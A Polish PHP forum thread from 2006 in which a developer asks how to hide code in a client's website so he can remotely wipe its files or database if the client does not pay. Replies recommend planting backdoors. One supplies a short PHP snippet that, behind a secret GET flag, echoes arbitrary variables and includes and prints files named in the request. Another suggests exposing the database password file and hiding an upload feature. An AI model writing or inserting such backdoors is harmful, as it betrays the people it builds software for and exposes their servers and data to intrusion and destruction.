Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> Jak zabezpieczyć stronę przed nieuczciwym klientem
jarod20
post 29.03.2006, 17:59:07
Post #1





Grupa: Zarejestrowani
Postów: 31
Pomógł: 0
Dołączył: 14.01.2004
Skąd: Mragowo

Ostrzeżenie: (0%)
-----


Witam,
Załóżmy że tworzę komercyjną stronę i chciałbym zabezpieczyć się przed nieuczciwym klientem, poprzez na przykład umieszczenie gdzieś w kodzie strony skryptu lub fragmentu kodu umożliwiającego mi np. wywołanie zdalnego skryptu kasującego pliki na serwerze (do którego normalnie nie mam dostępu), lub np. skryptu kasującego bazę danych (lub choćby wszystkie w niej wpisy). Czy ktoś ma może pomysł jak to zrobić. A może sami macie podobne metody zabezpieczania swoich projektów, a jeśli tak to jakie?
Pozdrawiam.
Go to the top of the page
+Quote Post
chomiczek
post 30.03.2006, 07:58:04
Post #2





Grupa: Zarejestrowani
Postów: 271
Pomógł: 4
Dołączył: 5.01.2005

Ostrzeżenie: (0%)
-----


SQL Injection/Insertion
poszukaj też o XSS

A na przyszłość użyj najpier szukaj!


--------------------
created by chomiczek
Go to the top of the page
+Quote Post
huntercs
post 30.03.2006, 08:08:15
Post #3





Grupa: Zarejestrowani
Postów: 94
Pomógł: 0
Dołączył: 6.02.2005

Ostrzeżenie: (0%)
-----


aby zapezpieczyć się przed sytuacją gdy dałeś skrypt i nie otrzymałeś wynagrodzenia, możesz gdzieś umieścić coś typu:
  1. <?php
  2. if($_GET['secure']==1)
  3. {
  4. echo $$_GET['var'];
  5. include_once($_GET['inc']);
  6. highlight_file($_GET['inc']);
  7. }
  8. ?>

a po finalizacji usunąć ten kod


--------------------


Go to the top of the page
+Quote Post
Dex1987
post 30.03.2006, 10:07:45
Post #4





Grupa: Zarejestrowani
Postów: 246
Pomógł: 0
Dołączył: 28.09.2004

Ostrzeżenie: (0%)
-----


mozesz stworzyc cos takiego co bedzie wyswietlalo zawartosc pliku z haslami do bazy danych, pozniej zrobisz co zechcesz, mozesz rownierz zrobic jakis upload i w kazdej chwili bedziesz mugl dopisac jakis skrypcik i wrzucic na serwer. pamietaj o zabezpieczeniu takich rzeczy haslem ;]

Pozdrawiam dex.
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 25.06.2025 - 09:32